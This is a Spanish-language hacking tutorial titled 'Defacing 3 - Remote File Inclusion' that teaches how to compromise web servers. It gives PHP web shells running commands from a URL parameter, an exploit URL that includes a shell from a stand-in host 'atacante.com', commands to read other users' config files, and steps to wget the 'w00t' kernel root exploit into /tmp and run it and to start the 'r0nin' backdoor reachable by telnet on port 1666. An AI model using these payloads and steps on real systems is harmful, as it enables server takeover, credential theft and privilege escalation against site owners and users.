################################################################################ ######## ##### # # # ## # # ## # # # # ##### # # #### # ##### ### # # # # # # # # # # # # #### # #### #### # # ### # # #### # #### ##### #####

# # # #### # # # # # # ### # ## # #

# # ## # # # # #

##### # # # # # # #####

# #### #

##### #

################################################################################ ######## * Defacing 3 - Remote File Inclusion * www.digital-system.org - csuser.x[at]gmail[dot]com ################################################################################ ######## Remote File Inclusion La famosa tcnica RFI. Esta vulnerabilidad permite incluir archivos remotos de otr os servidores, la mayora de estas vulnerabilidades se encuentran en cdigos como: ******************** <? include"$page"; ?> ******************** Este seria explotado de esta manera: ******************************** vuln.php?page=http//[atacante] ******************************** Pero A qu pagina enviamos este archivo? Lo mas normal es enviarlo a uno para poder ejecutar comandos, el archivo podra tener cualquiera de estos: **************************************************** <? exec($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> exec(); *******

<? system($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> system(); ******* <? passthru($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> passthru(); ***************************************************** Bien ya tenemos el archivo con este cdigo le ponemos una extensin .gif .jpg cual s ea mientras no sea php sino lo ejecutara en nuestro server. Lo subimos al server y l o tenemos todo preparado, imaginemos que el url es http://atacante.com/xpl.gif, en xpl.gif debe haber uno de esos 3 cdigos de arriba, cada uno usa una variante distinta ya que algunos servidores puede que alguna la tenga bloqueada para que no hagan tonteras . Ahora hacemos un url as... ---> http://victima.com/vuln.php?page=http://atacante.com/xpl.gif?cmd=id; Podemos ver como estamos incluyendo nuestro archivo, inyectamos un cdigo php y ha ciendo que lo ejecute. Entonces haramos ..xpl.gif?cmd=[aqu el comando] All va el comando a ejecutar, como una shell. Qu podemos hacer con esto? Pues muchas cosas, como por ejemplo comandos como "cat" para ver archivos como l os de configuracin en texto plano, y as obtener informacin tambin podemos hacer cat en los archivos de otros usuarios, por ejemplo: *************************************************** ---> "cd/home/fulanito/public_html;cat config.php" O para conseguir una lista de archivos: ---> "cd/home/fulanito/public_html;ls" *************************************************** Pues aun no esta lo mejor porque aun as sino tenemos permisos podemos obtenerlos por medio de xploits. A continuacin se explicar como utilizarlos. EXPLOIT w00t

Podemos rootear la maquina con un xploit que aprovecha un bug en el kernel 2.4 e l exploit se llama w00t. 1 Descargaremos w00t. 2 Iremos a la carpeta /tmp hay podemos ejecutar exploits desde nobody (cd/tmp) 3 Subiremos el w00t al server por medio de wget para esto sub el archivo w00t a t u server y ejecutamos lo siguiente dentro la carpeta tmp: **************************** "wget http://atacante/w00t" **************************** Esto recoger el archivo w00t de tu server y lo pasara a la carpeta en la que ests (/tmp) 4 Lo que haremos ahora ser dar permisos chmod 777 a w00t para poder ejecutarlo (chmod -c 777 w00t) 5 Ahora lo ejecutaremos (./w00t)6 6 Ahora para saber si funciono escribiremos "id" y nos saldr nuestro id, nos debe r dar otro que no sea el de nobody con este no somos root pero tenemos bastantes permi sos. EXPLOIT r0nin Tambin podemos ejecutar un backdoor en el server para poder entrar con una shell aunque sea como nobody pero nos puede ser muy til. Este xploit se llama r0nin como en la explicacin anterior haremos lo mismo: 1 Descargaremos el xploit r0nin 2 Lo subiremos a la carpeta /tmp y le daremos permisos chmod 777 (explicado ante riormente) 3 Hay le ejecutaremos (./r0nin) 4 Si funciona bien veremos algo como: PsychoPhobia Backdoor is starting...OK, pi d = xxxx, (en la xxxx saldr unos nmeros que es el pid). 5 Bien ahora el backdoor esta ejecutado para entrar entraremos por telnet en el puerto 1666. Tambin podemos usar el PuTTy para esto. Aqu encontramos una shell como nobody o co mo lo hayamos ejecutado.

################################################################################ ######## * Texto recopilado de la Red. [Editado por Digital SYstem] * www.digital-system.org - csuser.x[at]gmail[dot]com ################################################################################

########